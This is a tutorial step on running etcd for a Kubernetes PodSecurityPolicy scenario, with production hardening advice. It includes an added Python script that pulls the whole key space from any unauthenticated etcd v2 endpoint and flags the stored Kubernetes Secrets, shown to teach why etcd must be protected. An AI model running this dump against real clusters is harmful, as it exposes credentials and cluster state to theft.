Difficulty: intermediate
Estimated Time: 10-15 minutes

This scenario explains the usage of PodSecurityPolicy in a Kubernetes cluster.

For a detailed explanation of PodSecurityPolicy usage scenarios, please refer to my blog article http://cloudgeekz.com/1204/docker-cluster-kubernetes-policies.html

This scenario has explained how to launch a Kubernetes cluster and use PodSecurityPolicy to enforce cluster-wide policies.


Using Pod Security Policy in a Kubernetes Cluster

Step 1 of 7

Step 1 - Etcd

Etcd is a "Distributed reliable key-value store for the most critical data of a distributed system". Kubernetes uses Etcd to store the state of the cluster and to provide service discovery between nodes. This state includes which nodes exist in the cluster, which pods should be running, which nodes they are scheduled on, and every other API object, Secrets included. Whoever can read and write etcd therefore controls the whole cluster, so access to it must be protected at least as carefully as access to the API server.

The command below will launch a single node etcd cluster listening on port 4001.

```bash
docker run -d --name=etcd \
  --net=host \
  gcr.io/google_containers/etcd:2.2.5 \
  /usr/local/bin/etcd \
  --listen-client-urls=http://0.0.0.0:4001 \
  --advertise-client-urls=http://0.0.0.0:4001 \
  --data-dir=/var/etcd/data
```

The `--net=host` flag means the container will share the host's network namespace, removing the need to map ports. Note that, combined with `--listen-client-urls=http://0.0.0.0:4001`, this binds etcd to every interface on the host over plain HTTP with no authentication, which is acceptable for this sandbox but not for anything else: any client that can reach port 4001 can read and modify the complete cluster state.

In production you would want to run etcd as an odd-sized cluster (three or five members on separate machines) so that it keeps a quorum when a member fails, bind the client URLs to a private address, and require TLS with client certificate authentication on the client and peer ports.
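To make the consequence of the unauthenticated listener concrete, here is an added example (not part of the original scenario) that walks an etcd v2 key space recursively and flags the keys holding Kubernetes Secret objects. It assumes the `/v2/keys` HTTP API served by the etcd 2.2.5 image above and the default `/registry` prefix under which Kubernetes stores its objects; when run without a URL it uses a constructed sample response so it works offline. Secret values are stored base64-encoded, not encrypted, unless the API server is configured to encrypt them at rest.

```python
"""Walk an etcd v2 key space and flag Kubernetes Secret objects.

Added example. Assumptions: the etcd v2 HTTP API (/v2/keys) exposed by the
gcr.io/google_containers/etcd:2.2.5 image, and the default /registry prefix
Kubernetes uses for its objects. The sample response below is constructed.
"""
import json
import sys
import urllib.request

SECRET_PREFIX = "/registry/secrets/"


def flatten(node, out=None):
    """Collect (key, value) for every leaf under an etcd v2 "node" object.

    Directories carry dir=true and a "nodes" list; leaves carry a "value".
    The root node of a recursive GET has no "key", so default it to "/".
    """
    if out is None:
        out = []
    if node.get("dir"):
        for child in node.get("nodes", []):
            flatten(child, out)
    else:
        out.append((node.get("key", "/"), node.get("value", "")))
    return out


def find_secrets(pairs):
    """Return the keys that hold Kubernetes Secret objects, sorted."""
    return sorted(key for key, _ in pairs if key.startswith(SECRET_PREFIX))


def dump(base_url, timeout=3):
    """Fetch the entire key space from an etcd v2 endpoint.

    No credentials are sent: against the listener configured above this
    succeeds for anyone who can reach port 4001.
    """
    url = base_url.rstrip("/") + "/v2/keys/?recursive=true"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        body = json.load(resp)
    return flatten(body["node"])


# Constructed sample of a recursive GET response, for offline use only.
SAMPLE_RESPONSE = {
    "action": "get",
    "node": {
        "dir": True,
        "nodes": [{
            "key": "/registry",
            "dir": True,
            "nodes": [
                {
                    "key": "/registry/secrets",
                    "dir": True,
                    "nodes": [{
                        "key": "/registry/secrets/default",
                        "dir": True,
                        "nodes": [{
                            "key": "/registry/secrets/default/db-creds",
                            "value": '{"kind":"Secret","data":{"password":"cGFzc3dvcmQ="}}',
                        }],
                    }],
                },
                {
                    "key": "/registry/pods",
                    "dir": True,
                    "nodes": [{"key": "/registry/pods/default/web", "value": '{"kind":"Pod"}'}],
                },
            ],
        }],
    },
}


def main(argv):
    # Usage: python etcd_dump.py [http://127.0.0.1:4001]
    if len(argv) > 1:
        pairs = dump(argv[1])
    else:
        pairs = flatten(SAMPLE_RESPONSE["node"])
    for key, value in pairs:
        print(f"{key} = {value[:60]}")
    secrets = find_secrets(pairs)
    print(f"\n{len(secrets)} Secret object(s) readable with no authentication:")
    for key in secrets:
        print("  " + key)


if __name__ == "__main__":
    main(sys.argv)
```

Run it with the etcd URL from the scenario (`http://127.0.0.1:4001`) once the cluster has been created in the later steps; the same walk works against any etcd v2 endpoint that answers without a client certificate, which is exactly what a private bind address and TLS client authentication are meant to prevent.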